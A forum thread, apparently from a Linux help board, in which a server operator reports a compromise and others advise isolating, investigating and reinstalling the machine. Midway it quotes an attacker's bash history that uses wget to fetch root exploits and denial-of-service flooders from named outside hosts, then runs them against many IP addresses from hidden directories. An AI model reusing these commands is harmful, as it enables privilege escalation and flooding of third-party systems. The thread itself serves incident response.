/usr/local/cpanel/3rdparty/mailman/messages/fi /usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/fr /usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/hu /usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/it /usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ja /usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ko /usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/lt /usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/nl /usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/no /usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pl /usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pt /usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/pt_BR /usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ru /usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sr /usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sv /usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/uk /usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ca /usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/hr /usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/ro /usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/sl /usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/tr /usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/tests /usr/local/cpanel/3rdparty/mailman/tests/bounces /usr/local/cpanel/3rdparty/mailman/tests/msgs /usr/local/cpanel/3rdparty/mailman/suspended.lists /usr/local/cpanel/3rdparty/phpMyAdmin /usr/local/cpanel/3rdparty/phpMyAdmin/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/images /usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/lang /usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/libraries /usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS /usr/local/cpanel/3rdparty/phpMyAdmin/scripts /usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS /usr/sbin/sendmail /usr/sbin/utempter /etc/proftpd find: /proc/3209/fd: No such file or directory find: /proc/6268/fd: No such file or directory find: /proc/25154/fd/4: No such file or directory That is all...something bad? Thank you very much... |
Well it's pretty clear that the system has been cracked. Vadmin and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:
Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean! In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack. |
Get a listing of all currently running processes and check the integrity of rpms with rpm -Va. once you've got the system offline, you can either remove the compromised systems hard-drive, replace it with a new one, then format and re-install from trusted media or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a back up). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.
If you want to do any kind of further analysis, boot your system with a cd-rom based linux distro like knoppix or FIRE and then mount the compromised hd, read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but your never said what user that is. |
Big problme, that is BIG PROBLEEEEM....offline, f***...
Yes...user...he run it every time with same username (one site) and evry time in "var/tmp", before I run "scripts/securetmp" he run it in "tmp"!!! But THAT SITE IS MY SITE!! Yes, I change password, that don`t help! In logs for that site I can`t find nothing! Also, I can`t remove HD, server is not my, I pay one company for that server... But, I have much sites on that server....and some of that sites is not my! How much time server must be offline and can I restore all accounts and data for all sites? This can be big problem, somebody can think that I attack that servers...and I can lose this server from this company! Also, yes, I use ikonboard board! |
Have you tried looking at the users bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?
FWIW, /var/tmp is often writable to normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access. |
Let this be a lesson to people to make your /tmp and /var directories on a seperate partition and add the noexec flag to fstab. That will stop a heck of a lot of script kiddies in their tracks.
|
Yes, yes yes.....I find it I find it......in ".bash_history" for this account I find this:
kill 29515 kill 29515 kill 29515 ls ls cd /tmp ls rm * ls cd /var/tmp ls uanem -a uname -a wget http://www.kpteam.org/xpl/w00t.zip unzip http://www.kpteam.org/xpl/w00t.zip unzip w00t.zip chmod +x w00t ./w00t id wget http://www.rootthief.com/binarys/mremap_pte chmod +x mremap_pte ./mremap_pte id wget http://www.rootthief.com/binarys/NmapYa chmod +x NmapYa ./NmapYa id nmap ./ NmapYa wget http://www.rootthief.com/binarys/cvs chmod +x cvs ./cvs ./cvs ./cvs forum.aboutpc.net ls rm * ls wget http://www.rootthief.com/binarys/ptrace chmod +x ptrace ./ptrace id ./ptrace; id ls ps kill 23425 rm * wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip rm vadimI.zip chmod +x vadimI ./vadimI ./vadimI 200.214.14.71 80 200.214.14.7 ps kill 27391 wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x f3 ls ./vadimI 200.164.65.34 80 200.164.65.3 ./f3 200.216.161.140 10000 200 ps kill 31240 ps ps ps ps ps ps kill -9 31239 kill -9 31240 ps ./f3 161.24.72.80 ./f3 161.24.72.80 1000 200 id ps ./vadimI 200.216.161.140 59 200.216.161.14 w w ls id uname -a wget http://www.portalsecurityall.hpg.ig.com.br/exploits/PT chmod +x PT ./PT id rm PT exit wget http://www.portalsecurityall.hpg.ig....3.10ALPHA7.tgz ls rm -rf nmap-3.10ALPHA7.tgz ls wget http://www.malukinhow.com/mirc615.exe ls rm -rf mirc615.exe ls id ls ps ./f3 w ls ./vadimI 200.165.49.5 80 200.165.49.1 ps ls ./f3 ./f3 200.247.39.196 ./f3 200.247.39.196 1000 600 id ./f3 200.247.39.196 1000 600 ls ps kill 18353 kill 18354 kill 19787 ls ps kill -9 18354 kill -9 18353 ps ./f3 200.247.39.196 1000 600 ps kill -9 21132 ps ./f3 66.90.87.13 1000 600 ps kill -9 21911 ./vadimI 66.90.87.13 1286 66.90.87.1 w ls ls -a ps exit ls ls -a mkdir .... cd .... ls ls pwd w wget http://www.aloysio.hpg.ig.com.br/f3 wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip chmod +x * ls rm -rf vadimI.zip id ./f3 ./f3 200.154.201.39 1000 200 ls ls -a cd .... ./f3 200.154.201.39 1000 200 id ps cd .... ls ./vadimI 66.45.239.202 6005 66.45.239.20 id ./vadimI 66.45.239.202 6005 66.45.239.20 ps ./f3 201.7.10.73 1000 40 cd .... ./f3 201.7.10.73 1000 40 ./vadimI 201.7.10.73 139 201.7.10.73 ps kill 291243 kill 29124 ps cd ... cd .... ./f3 201.7.10.73 10000 100 ps kill -9 29558 ps ls cd .... ./vadimI 200.158.190.101 2004 200.158.190.10 ls cd .... ls ls -a ps mkdir .i cd .i ls wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x * ls ./f3 ./f3 201.7.89.160 1000 100 ls wget http://www.enzotech.net/code/neuter.c ps kill 15818 ps w ls cd .i ls ./f3 200.222.176.13 100 10 ls cd .i ls ./f3 200.180.52.203 200 300 ./f3 200.180.52.203 1000 200 lynx ls lynx http://www.rootthief.com/binarys/mremap_pte w ls pwd cd .... ls -a mkdir ... cd ... ls wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x * ./f3 ./f3 200.140.88.186 500 300 ps w ls -a pwd mkdir .s cd .s wget http://www.aloysio.hpg.ig.com.br/f3 ls ls -a cd .s ls ps kill 21493 ps wget http://www.aloysio.hpg.ig.com.br/f3 ./f3 200.228.76.178 500 180 chmod +x f3 ./f3 200.228.76.178 500 180 id cd .s ./f3 200.97.201.28 500 180 ./f3 200.97.201.28 500 300 ls ls -a mkdir .l cd .l wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip chmod +x vadimI ./vadimI ls ./vadimI 66.221.169.110 80 66.221.169.11 ps kill 20441 ps kill -9 20322 ps kill -9 20323 ps cd .l ls ./vadimI 66.221.169.110 80 66.221.169.110 ./vadimI 66.235.202.52 80 66.235.202.5 wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x f3 ./f3 ./f3 200.221.8.44 500 300 ./f3 200.226.137.9 1000 300 ./f3 200.223.39.2 1000 100 ls cd .l ./vadimI ./vadimI 200.192.176.133 80 200.192.176.133 ps kill 15811 kill -9 14844 kill -9 14845 kill -9 14844 kill -9 15535 ls ls -a w tty uname -a ping mkdir .k cd .k ls wget http://www.luckyan.com/r00t/flood.tgz tar xfv flood.tgz tar xzvf flood.tgz cd dos ls ./slice2 chmod +x * ./slice2 cd .. wget http://mihai-doini.org/flood.tgz ls rm * wget http://mihai-doini.org/flood.tgz tar xzvf flood.tgz cd flood ls chmod +x chmod +x * ./sl ls ls s* ./slice3 ./sl3 ./stream ls ./xdestroy ./udp ./juno ./juno 200.222.173.87 139 ./xshock ls ./rc8 ./rc8 200.222.173.87 ./rc8 200.222.173.87 200.222.173.87 ./s ls ./smack ./smack 200.222.173.87 ./alpha ./alpha 200.222.173.87 139 200.222.173.87 l ls ./nestea ./da.sh ls ls -a cd .k ls rm -rf f* cd dos ls mv vadimI .. cd .. ls rm -rf dos ls wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x f3 ls ./vadimI 200.188.191.131 80 200.188.191.13 ./vadimI 200.188.191.131 80 200.188.191.13 ./f3 200.188.191.131 1000 300 ./f3 200.188.191.131 1000 300 ps kill -9 11654 kill -9 15977 ps ./vadimI 200.208.28.224 80 200.208.28.22 ps kill 16235 ps ./vadimI 200.188.191.131 53 200.188.191.13 cd .k ls ./vadimI 200.188.191.131 53 200.188.191.13 cd .k ./f3 200.99.102.226 ./f3 200.99.102.226 500 300 ./f3 200.99.102.226 1000 300 ./f3 200.99.102.226 1000 300 ls ls -a ps setterm -file `perl -e 'print "A"x249'` setterm setterm -file `perl -e 'print "A"x249'` ./vadimI 66.90.122.94 6667 66.90.122.80 cd .... ./vadimI 66.90.122.94 6667 66.90.122.80 ./vadimI 66.90.122.94 6667 66.90.122.80 id ls ls -a cd .... ls wget http://nene.nu/c4 chmod +x c4 ./c4 ./c4 66.90.122.94 -p 6665,6667 ./c4 66.90.122.94 -p 6665,6667 ./c4 66.90.122.94 ./c4 -h 66.90.122.94 -p 6665,6667 cd .... ls wget http://www.aloysio.hpg.ig.com.br/f3 chmod +x * ./f3 ./f3 66.90.122.94 1000 300 ls ./vadimI 207.44.244.102 80 207.44.244.10 ps ls ls -a wget eagle.kecapi.com/sec/codes/phpmy-explt.c gcc -o phpmyphpmy-explt.c mkdir .... mv phpmy-explt.c .... cd .... ls gcc traceroute ls -a mkdir .h ls -a cd .h wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip wget http://www.aloysio.hpg.ig.com.br/f3 ls unzip vadimI.zip ./v rm -rf *.zip chmod +x * ./v ./vadimI ./f3216.239.39.10465535 600 ./f3 200.152.253.20 1000 600 id uanme -a showmount ls ls -a pwd ps ls ls -a mkdir .c cd .c pwd wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip wget http://www.aloysio.hpg.ig.com.br/f3 rm *.zip wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip rm *.zip chmod +x * ls ./vadimI 24.61.211.193 80 24.61.211.19 w ls ps ps ps ls ls -a mkdir .l cd .l wget http://packetstormsecurity.nl/DoS/udp.pl chmod +x * ./udp.pl ./udp 200.222.175.87 139 1 ./udp.pl 200.222.175.87 139 1 3ps ps cd .... ls perl udp.pl 200.222.169 ls ls -pa ls -a mkdir .... cd .... wget http://geocities.yahoo.com.br/mat_ad0r/udp.pl chmod +x * ./udp.pl 201.5.121 perl udp.pl 201.5.121 ps killall -9 perl ps ls cd .... ls rm u* ls ps killall -9 vadimI ps ls -a cd .... ls wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip unzip vadimI.zip chmod +x * rm *.zip ls ./vadimI 200.103.98.206 6667 200.103.98.20 ./vadimI 200.103.98.206 6667 200.103.98.20 ./vadimI 200.103.98.206 6667 200.103.98.20 ls ls -a cd .... ls ./vadimI 66.90.84.99 6667 66.90.84.9 but but but, THAT IS MY ACCOUNT!!!! How he do this? He have SSH access or what? What I can do now? Disable SSH for this account, can I disable all SSH access for this account in WHM.... But I change password for this account.... He use some bad PHP/PERL script for this or what, how I can find that....? Thanks. |
Quote:
Your best bet would be to put in a fresh system that is armoured to the teeth. The attacker could have made several ways availabe to her(him)self to regain access to your system. So, disabling ssh or changing your password or root password may not be entirely effective. |
The bash_history shows a mix of downloading DoS tools and Linux root exploits (ie. mremap and ptrace) as well as creation of a number of "hidden" dirs like ... or .l or .k etc. From the bash_history, it's hard to tell if any of the priviledge escalation attacks were successfull. Again, check the system logs for any application/kernel errors, oops, segfaults, or panics.
As far as how access is attained, that depends on what services are being run (ssh,telnet,etc). Take a look at the output of last and at /var/log/secure and look for abnormal login info or logins that corresponded to odd activity. You can try turning off ssh, but I was assuming that's how you accessed the system. You can try denying the user access by modifying the sshd config file and adding the DenyUsers <username> directive. Though i'd assume since you are the compromised user, that you'd lock yourself out. If you have an alternative account then you'd still be able to login (just don't tell me it's root). So far you haven't really given us enough info to say how access to your account was attained. It could be a sniffed password, insecure cgi script, some other vuln...hard to say exactly without any real evidence. |
Yes, on my server he can access with ssh/telnet...
When I edit var/log/secure I find: Jul 16 19:50:01 plain sshd[13887]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13888]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13889]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13914]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13890]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13892]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13915]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13916]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13891]: Did not receive identification string from IP Jul 16 19:50:01 plain sshd[13893]: Did not receive identification string from IP every few days I have this...or every day... Yes, I can`t turn off ssh...but I can add "DenyUsers <username> " Yes, I have root access.... Also, if I good see in .bash_history, he directly work in /var/tmp, he don`t change dir (cd some_somedir, cd .. ...), he only create one folder, download file, extract and execute that file... |
Will you please take your bloody server offline already!
|
No, I can`t do that for to much time...I`ll lose all on what I work very much time...and also I have people who pay to me...
Can somebody tell to me how I can disable WGET for this account (only one account)? Not for all accounts! This can help....also, I change some more thing and I`ll now edit all scripts for that account! Thanks |
Ok, so you're renting this server off of another company, and providing hosting services to many sites. So people are paying you to provide a reliable service, but atm you're knowingly allowing another companies machines to participate in Denial of Service attacks on other internet users.
You MUST inform your server provider of the break in, and ask them to backup your data and reinstall the OS, as the Mods here have told you repeatedly. You wont have anything if this guy decideds to completely take control of your precious server and all it's hosted sites, so show some action, NOW! |
Quote:
|
The bug where in the php of your site. Turn on safe_mode in your php.ini config file then restart the apache. Locate any suspicious .php files in yout web server that have functions system.. and search the string wget in yout apache logs, to finde the ip invasor.
Upgrade the version of your kernel, in som version of kernels 2.4 have one bug that allow to exploit the kernel and gain root acces. Verify the ports open on your system and if have suspicious executables in ps. Regards. |
All times are GMT -5. The time now is 04:14 PM. |